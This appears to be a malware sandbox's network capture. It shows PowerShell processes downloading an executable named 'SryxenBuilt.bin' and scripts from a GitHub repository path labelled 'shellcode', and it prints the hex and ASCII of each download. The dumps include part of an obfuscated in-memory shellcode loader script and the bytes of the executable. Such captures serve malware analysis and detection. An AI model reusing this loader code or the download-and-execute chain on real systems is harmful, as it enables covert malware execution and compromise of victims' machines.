2025-01-08 09:15:35 UTC	1378	IN	Data Raw: f8 ec 59 7d b2 b8 2f c6 9c 5e 48 7f c1 50 47 44 2d b2 22 60 bb 11 be f6 2f 13 72 08 3b b1 2b e0 6b 86 f6 ee 47 ad 7d 35 cd b1 7c 0d 1c a8 25 f4 ef 01 ec f7 18 f4 1f 53 e9 3e 8a 1e 3a a0 db 42 57 f8 0c a9 e8 f0 fe 05 3e 65 67 df 21 89 24 2a 48 85 57 c8 b7 27 7e 05 ba 31 43 7b e6 39 c3 91 78 b1 4b a4 ce 60 e3 65 32 2a 4e c4 ae 01 6b 78 b8 33 f6 e4 5e 4b 12 93 a4 53 62 d6 7b b0 f7 55 8f 35 86 28 d2 95 66 0c 92 e9 8e 2f fc 94 54 d3 c9 df b2 31 ce c2 67 5b 2e 48 8b 50 24 43 d7 f0 ad ea fd fd a4 7c 77 ae 08 ac 25 89 41 d8 3f ec 8a 20 cc a5 a2 f1 e5 0f 00 de 9e fc d4 07 76 a8 f5 06 d9 3b 10 ad 83 f9 d1 ca 81 aa ab c9 4a 08 3f 00 89 b7 4c c8 a9 48 7e a2 a6 bb 96 55 64 2b 23 79 b9 fa cb 79 74 4f d3 01 95 48 05 d2 47 dd a1 df 48 5d 93 98 b0 cb 7d 6f ba c5 a4 dd e1 Data Ascii: Y}/^HPGD-"`/r;+kG}5\|%S>:BW>eg!$HW'~1C{9xK`e2Nkx3^KSb{U5(f/T1g[.HP$C\|w%A? v;J?LH~Ud+#yytOHGH]}o
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: b0 8b 80 18 f9 b4 7d 05 a3 eb 1e 14 e9 fd 3f 99 56 43 9b 48 d3 c7 f8 c6 d1 9c dc c9 33 4b 2c 72 d5 21 d7 68 31 65 75 2a 68 2b 6e be 02 95 ca 80 29 ea d3 07 9b 31 6f f1 a5 06 8a c4 ca 2d 84 03 9e 51 17 54 b1 47 f7 ac ca 5c 79 cd ab 77 4c 25 c1 dd db 07 bb fd ad 2d 97 c5 69 d5 74 41 7c 82 ad fd 1b 31 77 04 44 c7 82 8d 54 cb 49 1b f6 e4 ca d1 61 11 26 00 c8 8c b0 64 82 aa b4 f1 a3 f9 73 80 d4 f2 01 4d 05 a0 5a db d2 43 ff c3 fa 6c 22 65 6b dc 1b 2d 57 63 e6 84 c1 be 89 c2 b1 3f ef 57 2b 88 9f c0 83 2d ea 29 7a b2 0e b9 5f ec b6 07 08 6d 71 21 39 2b 8d ea b3 7e e5 8f 71 d3 d8 42 fb 13 f9 9c ff 31 7a fb ff c7 a5 cd 57 e3 43 58 8f 93 3e 89 a4 95 69 f2 01 f6 cc d6 c0 f7 5f 67 84 68 ec 45 f2 86 9a cf e8 fb 1b 1e 99 e8 8f d2 40 5d 0c 52 92 04 6a 4e 9d 86 e2 4f e6 Data Ascii: }?VCH3K,r!h1eu*h+n)1o-QTG\ywL%-itA\|1wDTIa&dsMZCl"ek-Wc?W+-)z_mq!9+~qB1zWCX>i_ghE@]RjNO
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 16 a8 42 c3 bf fc 53 aa 4d 8a 8b 4a 17 e7 38 e2 96 ec ce 2c 6a b4 be a7 d4 63 db 99 76 08 8d b5 a2 04 a5 8a 4f 6e 60 c1 38 f3 e0 ad ef 9e 93 fa 3a e0 d9 4b 83 2e 18 07 23 47 e6 c0 a9 9a bc fd 64 17 8f 58 0a 65 ff 8e 99 5f 59 2a b8 a7 2d 14 59 dc d3 6b 86 86 4e 06 98 93 fa b3 69 8c 94 04 e2 09 3a 59 f8 11 f5 89 dc 59 d6 5c a2 fe 5d be bf c9 8c 86 e7 18 ba 5d ed 65 98 08 1d 30 7e d7 2e 56 cc f5 93 43 31 e6 c1 82 3d 36 7c fe c1 4e fd 0b aa e3 6a fd ff f9 0e 4c e0 c4 db 3d 78 99 81 52 04 f0 d0 fa d3 7b 70 d1 5a 41 69 6d aa cf eb fc ff 0f ce 34 81 be 31 60 e2 66 44 9c 3b 3e ba 9c 2d f9 d2 f4 6a 0c 0b 9b f9 57 82 8d 2c 21 9a 09 b2 7e 46 aa f7 fe 26 66 e9 b9 4c 4f 3f 08 5b 11 c8 bb f2 2d e1 34 d8 23 8c 0f 80 50 58 82 b5 bb 77 93 7e cd 7e 89 74 09 09 28 3c 76 c2 Data Ascii: BSMJ8,jcvOn`8:K.#GdXe_Y*-YkNi:YY\]]e0~.VC1=6\|NjL=xR{pZAim41`fD;>-jW,!~F&fLO?[-4#PXw~~t(<v
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 10 8a c2 11 a8 64 19 40 f6 c9 07 66 01 88 a0 11 9c 07 aa ab cb f7 fe d3 82 ca 19 e1 25 84 61 69 c7 6e 0d 11 a2 d4 52 fa 82 05 b6 07 ea 6e e5 83 42 d8 87 d3 76 45 a3 f1 9e f7 96 fa 9c d5 21 f8 cb ea df 9d f6 59 57 90 32 06 88 76 6f 52 ee 6d b8 13 b0 bf 80 cb f8 96 52 07 5c 01 5d 09 d3 55 86 3d 1f fd e5 91 57 9a 62 58 37 ce 7d e6 14 46 c7 b5 be f1 26 69 46 9c 67 f4 72 1d 28 30 8f 69 1d 94 fc c4 8b 23 06 7e 37 65 f2 29 14 fa fb 6f 75 d6 7b 27 d8 0b 7d fe b2 40 9a 0d b7 00 d9 b3 8c 89 5b 69 ee 68 17 ea 46 e0 03 45 04 21 c9 af c0 28 0b 5d 45 ec 2d b9 00 12 ce 1d 65 03 b4 17 db b7 e3 73 b1 71 7c a7 a0 71 6d 07 c8 ce 71 bd 5d 2f 0e 77 91 14 15 50 c1 66 9c 0f e5 cb 6c bc 43 95 5e 76 99 d5 63 9f 3e b8 14 cc 3c f5 5b ab a0 c1 1c 1e 73 96 89 0e b6 90 ec 26 3d b3 82 Data Ascii: d@f%ainRnBvE!YW2voRmR\]U=WbX7}F&iFgr(0i#~7e)ou{'}@[ihFE!(]E-esq\|qmq]/wPflC^vc><[s&=
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 82 e4 5f 7c 51 67 87 80 d0 d6 e8 d8 45 e5 5c 70 a6 00 a9 a8 db 4c 5b c7 8d ad 94 ee 73 bd bf 7e 5a 7a 14 49 b3 8f 55 47 13 c2 e2 97 27 b2 d9 9a 0d 9d f8 03 b7 8e 62 eb e8 db d5 61 58 a1 d5 f8 b4 11 49 2c cd db c1 75 55 b1 36 d7 89 1f fb d2 6a c3 5f c2 cc 6a 1e 5c 37 4e 13 6b 00 46 93 84 ad 47 a4 ce 2c 34 b0 80 8a 50 83 d3 1e 2a 58 1d 46 92 8d 74 7d 53 b1 76 76 ea b6 f7 6c 92 94 9f f3 33 44 fa 29 fa a1 55 b3 7d de 7d 02 03 ce ca a7 d8 b0 ca 22 23 21 9b f2 20 48 4c 1f 03 5b 91 5c e6 45 2a 81 de 21 69 37 66 01 83 4f c8 05 ae cd da f3 f0 49 6f 8d b1 4d 6c 8e ad 07 df 43 a7 68 84 32 67 67 46 3f 7f 47 fc 81 af 2e 9a 55 63 b6 96 7d 85 58 96 59 ca 95 3f 63 82 3a 63 56 1e 69 91 24 ae 13 d7 56 76 a0 27 97 66 2d 8c 07 6e 42 f2 65 80 b1 bb 2b 99 24 33 fe 26 e1 45 a0 Data Ascii: _\|QgE\pL[s~ZzIUG'baXI,uU6j_j\7NkFG,4PXFt}Svvl3D)U}}"#! HL[\E!i7fOIoMlCh2ggF?G.Uc}XY?c:cVi$Vv'f-nBe+$3&E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49875	185.199.111.133	443	1156	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:36 UTC	624	OUT	GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com
2025-01-08 09:15:36 UTC	798	IN	HTTP/1.1 200 OK Connection: close Content-Length: 9790976 Content-Type: application/octet-stream Last-Modified: Tue, 26 Nov 2024 19:52:15 GMT ETag: "0x8DD0E53D3A2D426" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: bd8367b9-201e-004f-1c15-5f9001000000 x-ms-version: 2024-11-04 x-ms-creation-time: Tue, 26 Nov 2024 19:52:15 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=SryxenBuilt.bin x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Wed, 08 Jan 2025 09:15:36 GMT X-Served-By: cache-iad-kjyo7100021-IAD, cache-nyc-kteb1890053-NYC X-Cache: HIT, MISS X-Cache-Hits: 23, 0 X-Timer: S1736327736.109943,VS0,VE7
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 60 95 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 00 00 00 00 00 a2 8b 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 ee 49 00 00 ee 04 00 00 00 00 00 e0 22 07 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 10 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 95 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZERYHHH`!L!This program cannot be run in DOS mode.$PEd"I"@``
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 00 48 8d 04 d8 48 83 c4 10 5d c3 48 8d 05 68 3d 4c 00 48 8d 1d 21 24 59 00 90 e8 1b cf 03 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 e6 de 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 1c 10 48 85 c9 7c 16 be 01 00 00 00 d3 e6 48 83 f9 20 19 ff 21 fe 09 f3 88 1c 10 5d c3 e8 39 c1 03 00 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 14 10 48 85 c9 7c 16 bb 01 00 00 00 d3 e3 48 83 f9 20 19 f6 21 f3 84 d3 0f 95 c0 5d c3 e8 d9 c0 Data Ascii: HH]Hh=LH!$YHD$H\$HL$HD$H\$HL$UHHH?H=HHHHH)H\|H !]9UHHH?H=HHHHH)H\|H !]
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 48 83 c0 48 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 40 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 58 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 30 48 83 c4 08 5d c3 31 c0 48 83 c4 08 5d c3 48 89 44 24 08 e8 24 d9 06 00 48 8b 44 24 08 e9 1a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 91 00 00 00 55 48 89 e5 48 83 ec 08 48 89 44 24 18 e8 64 fc ff ff 0f 1f 40 00 48 83 f8 12 77 2a 48 83 f8 11 74 15 48 83 f8 12 75 34 48 8b 4c 24 18 48 8b 41 30 48 83 c4 08 5d c3 48 8b 4c 24 18 48 Data Ascii: HHH]HD$H@H]HD$H8H]HD$HPH]HD$HXH]HD$H8H]HD$H8H]HD$HPH]HD$H0H]1H]HD$$HD$I;fUHHHD$d@Hw*HtHu4HL$HA0H]HL$H
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 48 83 ec 08 48 89 5c 24 20 e8 c8 00 00 00 48 8b 4c 24 20 48 8b 04 c8 48 83 c4 08 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 2a d4 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5b 55 48 89 e5 48 83 ec 20 0f b6 50 14 f6 c2 01 bb 38 00 00 00 ba 48 00 00 00 48 0f 45 da 66 83 78 30 00 75 0d 31 c0 31 db 48 89 d9 48 83 c4 20 5d c3 48 89 44 24 30 48 8d 0d d1 8b 53 00 bf 0d 00 00 00 e8 b3 f8 ff ff 84 00 48 8b 54 24 30 0f b7 4a 30 48 89 cb 48 83 c4 20 5d c3 48 89 44 24 08 e8 95 d3 06 00 48 8b 44 24 08 eb 8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 94 00 00 00 55 48 89 e5 48 83 ec 28 48 89 44 24 38 e8 e4 fe ff ff 0f 1f 40 00 66 85 c0 75 0d 31 c0 31 db Data Ascii: HH\$ HL$ HH]HD$H\$*HD$H\$I;fv[UHH P8HHEfx0u11HH ]HD$0HSHT$0J0HH ]HD$HD$I;fUHH(HD$8@fu11
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 5d c3 48 8b 44 24 38 bb 01 00 00 00 e8 a3 fd ff ff 48 89 44 24 30 48 89 5c 24 28 48 8d 0c 03 48 8d 49 01 48 8b 44 24 38 48 89 cb e8 84 fd ff ff 48 89 5c 24 20 48 8b 4c 24 30 48 8b 54 24 28 48 01 d1 48 8d 0c 01 48 8d 49 01 48 8b 44 24 38 bf 10 00 00 00 48 89 cb 48 8d 0d a7 9c 53 00 e8 31 fc ff ff 48 8b 5c 24 20 48 85 db 7c 21 48 89 c1 48 f7 d9 90 48 39 cb 77 06 48 83 c4 40 5d c3 48 85 c0 74 05 e8 8b 5b 06 00 e8 c6 5b 06 00 e8 81 5b 06 00 90 48 89 44 24 08 e8 56 ce 06 00 48 8b 44 24 08 e9 2c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 f0 4d 3b 66 10 0f 86 46 03 00 00 55 48 89 e5 48 81 ec 88 00 00 00 48 89 84 24 98 00 00 00 48 89 8c 24 a8 00 00 00 48 81 fb 00 00 00 20 0f 8d dd 02 00 00 66 0f 1f 84 00 00 00 00 00 48 81 ff 00 00 00 20 0f 8d 89 02 Data Ascii: ]HD$8HD$0H\$(HHIHD$8HH\$ HL$0HT$(HHHIHD$8HHS1H\$ H\|!HHH9wH@]Ht[[[HD$VHD$,Ld$M;fFUHHH$H$H fH
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f2 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 52 c9 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f1 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 f2 c8 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 22 ec ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 92 c8 06 Data Ascii: I;fvUHHMf MuH]HD$RHD$Ll$fDM9,$uI$$I;fvUHHMf MuH]HD$HD$Ll$fDM9,$uI$$I;fvUHHMf Mu"H]HD$
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: cc d9 03 00 48 8b 74 24 50 48 8b 7c 24 78 66 90 e9 dd fd ff ff 48 8b 05 b4 bc 88 00 48 8b 0d b5 bc 88 00 eb 0b 48 83 c0 20 48 ff c9 0f 1f 40 00 48 85 c9 0f 8e 88 00 00 00 80 78 18 00 74 e6 0f b6 50 19 48 8b 58 10 84 d2 74 6f 80 3b 00 66 90 75 68 48 89 4c 24 50 48 89 44 24 70 48 8b 08 48 89 4c 24 78 48 8b 50 08 48 89 54 24 48 0f 1f 00 e8 fb d8 03 00 48 8d 05 7a f4 53 00 bb 19 00 00 00 e8 2a e1 03 00 48 8b 44 24 78 48 8b 5c 24 48 e8 1b e1 03 00 48 8d 05 64 de 53 00 bb 17 00 00 00 e8 0a e1 03 00 e8 25 d9 03 00 48 8b 44 24 70 48 8b 4c 24 50 e9 6b ff ff ff 88 13 e9 64 ff ff ff 48 83 ec 80 5d c3 49 8d 40 01 0f 1f 44 00 00 48 39 d0 0f 8d 80 00 00 00 49 89 c0 48 c1 e0 05 4c 8b 0d e9 bb 88 00 49 8b 4c 01 08 4d 8b 0c 01 48 39 f1 75 d2 4c 89 44 24 40 48 89 44 24 38 Data Ascii: Ht$PH\|$xfHHH H@HxtPHXto;fuhHL$PHD$pHHL$xHPHT$HHzS*HD$xH\$HHdS%HD$pHL$PkdH]I@DH9IHLILMH9uLD$@HD$8
2025-01-08 09:15:36 UTC	1378	IN	Data Raw: 21 4e 8b 8c 02 80 00 00 00 0f 1f 44 00 00 e8 fb dd 06 00 4d 89 0b 4e 8b 8c 02 90 00 00 00 4d 89 4b 08 4c 8d 0d 32 42 53 00 4e 89 8c 02 80 00 00 00 4c 8d 0d e7 5e 91 00 4e 89 8c 02 90 00 00 00 83 f8 03 0f 8d 07 02 00 00 48 8b 0d 2e b7 88 00 48 8b 1d 1f b7 88 00 48 83 c3 05 48 8b 15 0c b7 88 00 48 39 d9 73 48 48 89 d0 bf 05 00 00 00 48 8d 35 b8 c6 50 00 e8 93 0d 05 00 48 89 0d fc b6 88 00 83 3d 95 4e 91 00 00 74 16 0f 1f 00 e8 7b dd 06 00 49 89 03 48 8b 15 d1 b6 88 00 49 89 53 08 48 89 05 c6 b6 88 00 48 89 c2 8b 44 24 48 48 89 1d c0 b6 88 00 4c 8d 43 fb 49 c1 e0 05 4a c7 44 02 08 03 00 00 00 42 c6 44 02 18 00 42 c6 44 02 19 00 83 3d 44 4e 91 00 00 74 15 4e 8b 0c 02 e8 29 dd 06 00 4d 89 0b 4e 8b 4c 02 10 4d 89 4b 08 4c 8d 0d 6a 3c 53 00 4e 89 0c 02 4c 8d 0d Data Ascii: !NDMNMKL2BSNL^NH.HHHH9sHHH5PH=Nt{IHISHHD$HHLCIJDBDBD=DNtN)MNLMKLj<SNL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49936	185.199.110.133	443	7556	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:46 UTC	110	OUT	GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:46 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1318 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "094db1ccdecd0e644d016ac259ddfba14ea141479a6ed79913bf64dfbbe9253a" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 8AAE:3C087C:418B8A:484EB6:677E4232 Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:46 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740065-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1736327746.315743,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: bfa90bd78ef71540d71a4bff8df5476102700118 Expires: Wed, 08 Jan 2025 09:20:46 GMT Source-Age: 13
2025-01-08 09:15:46 UTC	1318	IN	Data Raw: 23 20 48 c3 a0 6d 20 74 e1 ba a1 6f 20 73 6f 63 6b 65 74 20 55 44 50 0a 66 75 6e 63 74 69 6f 6e 20 43 72 65 61 74 65 53 6f 63 6b 65 74 20 7b 0a 20 20 20 20 24 73 6f 63 6b 65 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 55 64 70 43 6c 69 65 6e 74 0a 20 20 20 20 24 73 6f 63 6b 65 74 2e 43 6c 69 65 6e 74 2e 53 65 74 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 28 5b 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 4c 65 76 65 6c 5d 3a 3a 49 50 2c 20 5b 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 4e 61 6d 65 5d 3a 3a 4d 75 6c 74 69 63 61 73 74 54 69 6d 65 54 6f 4c 69 76 65 2c 20 32 35 35 29 0a 20 20 20 20 72 65 74 75 72 Data Ascii: # Hm to socket UDPfunction CreateSocket { $socket = New-Object System.Net.Sockets.UdpClient $socket.Client.SetSocketOption([System.Net.Sockets.SocketOptionLevel]::IP, [System.Net.Sockets.SocketOptionName]::MulticastTimeToLive, 255) retur

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49938	185.199.110.133	443	7376	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:46 UTC	130	OUT	GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:46 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3490 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "c453847515f20228e686d320138664ed0c3c6bf84039aff4871e31f9a470f9b4" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 824A:24B4DA:3D6720:442A12:677E422E Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:46 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740027-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1736327747.772783,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 59a880fc6e202c734523e49a9c19442c51b1acaf Expires: Wed, 08 Jan 2025 09:20:46 GMT Source-Age: 13
2025-01-08 09:15:46 UTC	1378	IN	Data Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 28 27 53 69 6c 27 2b 27 65 6e 74 27 2b 27 6c 27 2b 27 79 43 6f 6e 74 69 6e 75 27 2b 27 65 27 29 0a 66 75 6e 63 74 69 6f 6e 20 62 6c 61 7a 65 4c 6f 61 64 65 72 20 7b 0a 20 20 20 20 50 61 72 61 6d 20 28 24 62 6c 61 7a 65 5f 6d 6f 64 75 6c 65 73 2c 20 24 62 6c 61 7a 65 5f 66 75 6e 63 29 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 60 52 60 52 65 60 4e 54 64 4f 4d 61 49 6e 22 2e 28 28 27 47 45 27 2b 27 54 27 29 2b 28 27 61 73 27 2b 27 53 27 29 2b 28 27 45 6d 42 4c 49 65 27 2b 27 53 27 29 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 6c 4f 60 42 61 4c 61 73 53 60 65 4d 42 4c 59 60 43 60 41 63 68 45 22 20 2d 61 6e 64 20 24 5f 2e Data Ascii: $ProgressPreference = ('Sil'+'ent'+'l'+'yContinu'+'e')function blazeLoader { Param ($blaze_modules, $blaze_func) $assem = ([AppDomain]::"cU`R`Re`NTdOMaIn".(('GE'+'T')+('as'+'S')+('EmBLIe'+'S')).Invoke() \| ? { $_."GlO`BaLasS`eMBLY`C`AchE" -and $_.
2025-01-08 09:15:46 UTC	1378	IN	Data Raw: 74 20 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 4e 61 6d 65 28 28 27 52 27 2b 27 65 66 6c 65 63 74 27 2b 27 65 64 44 65 6c 65 67 61 74 27 2b 27 65 27 29 29 29 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 2e 41 73 73 65 6d 62 6c 79 42 75 69 6c 64 65 72 41 63 63 65 73 73 5d 3a 3a 22 72 60 55 4e 22 29 2e 28 27 44 45 27 2b 28 27 66 69 6e 65 64 79 27 2b 27 6e 41 27 29 2b 28 27 4d 69 63 6d 27 2b 27 4f 27 29 2b 27 64 55 27 2b 27 6c 45 27 29 2e 49 6e 76 6f 6b 65 28 28 27 49 27 2b 27 6e 4d 65 6d 27 2b 27 6f 72 79 4d 27 2b 27 6f 64 27 2b 27 75 6c 65 27 29 2c 20 24 66 61 6c 73 65 29 2e 28 28 27 64 45 46 27 2b 27 69 6e 27 29 2b 27 65 27 2b 28 27 54 79 27 2b 27 70 45 27 29 29 2e 49 6e 76 6f 6b 65 28 28 Data Ascii: t 